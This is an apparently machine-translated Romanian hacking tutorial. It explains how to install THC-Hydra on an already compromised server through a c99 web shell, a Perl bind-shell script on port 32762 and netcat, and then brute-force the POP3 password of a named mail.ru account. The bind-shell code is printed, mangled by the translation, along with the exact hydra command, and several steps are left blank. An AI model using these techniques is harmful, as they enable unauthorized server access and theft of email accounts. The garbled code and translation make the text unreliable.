Voi vorbi despre cum să instalați THC-hydra pe un server hacked, pentru brute de cutii poștale. Plus de această metodă este că brute funcționează chiar și atunci când computerul este oprit, deoarece hydra atarna pe server ...
THC-Hydra - threaded parolele de cracare la diverse servicii (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, Cisco, etc) pentru platforme UNIX. Cu acest utilitar puteți ataca mai multe servicii în același timp. Voi vorbi despre cum să instalați THC-hidra pe un server hacked, pentru cutiile poștale Brutus. Plus de această metodă este că brute funcționează chiar și atunci când computerul este oprit, deoarece hydra atarna pe server ...
THC-Hydra - cracare parolă parțială pentru diferite servicii (platforme UNIX, ftp, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO etc.). Cu acest utilitar puteți ataca mai multe servicii în același timp.
Vom avea nevoie de:
1.THC-hidră
2.c99shell (sau orice altceva)
3.NetCAT - utilitate pentru back-conect, etc.
4.exploit pentru shell binda pe port ...
Ne mutăm la shell-ul web din directorul / tmp / / deoarece adesea este permis să scrie ...
Pentru ușurința utilizării, vom suspenda shell-ul pe portul 32762 și în ulterior vom ...
1. Deschideți notebook-ul și copiați-l pentru a exploata și salva ca bind_port.pl
cod:
#! / usr / bin / perl
$ port = 32762;
$ port = $ ARGV [0] dacă $ ARGV [0];
ieșiți în furculiță;
$ 0 = \ "actualizatb \". \ "\" X100;
$ SIG = 'IGNORE';
utilizați soclu;
soclu (S, PF_INET, SOCK_STREAM, 0);
setockopt (S, SOL_SOCKET, SO_REUSEADDR, 1);
obligați (S, sockaddr_in ($ port, INADDR_ANY));
ascultați (S, 50);
în timp ce (1)
accepta (X, S);
cu excepția cazului (furculiță)
deschideți STDIN, \ "# 038; X \";
deschideți STDERR, \ "> # 038; X \";
închide X;
exec (\ "/ bin / sh \");
>
închide X;
>
Am îmbinat fișierul rezultat în gazdă (narod.ru).
Apoi, invatam balansarea shell-ului nostru de web prin comanda care CURL
În cazul meu, ea
Acum deschideți netcat și conduceți site-ul și portul în el și faceți clic pe enter ...
Proxy de conectare ...
Acum umplem hidra ...
Acum comprimăm arhiva descărcată ...
cod:
tar xvzf hydra-5.4-src.tar.gz
Acum mergeți la dosarul cu Hydra și instalați ...
cod:
cd hidra-5,4-src /
Și mergem la instalare
urmată de o echipă
Instalarea este finalizată prin rularea comenzii
Acum aruncam pe server un dicționar mare cu parole și îl salvăm. În cazul meu, se numește dic și jurnalul va stoca rapoartele în el ...
Completați hidra cu comanda cp dic hidra-5.4-src / dic și cp log hidra-5.4-src / log
Și puteți începe brutu ...
Comandăm ./hydra -l 1xss -P dic -o log.txt -f pop.mail.ru pop3
-l - autentificarea victimei
-P - Dicționar al trecerilor
-o - jurnal de raport
-f - pop.mail.ru pop3 - cred că este clar))
Și puteți să vă culcați, să priviți jurnalul dimineața)))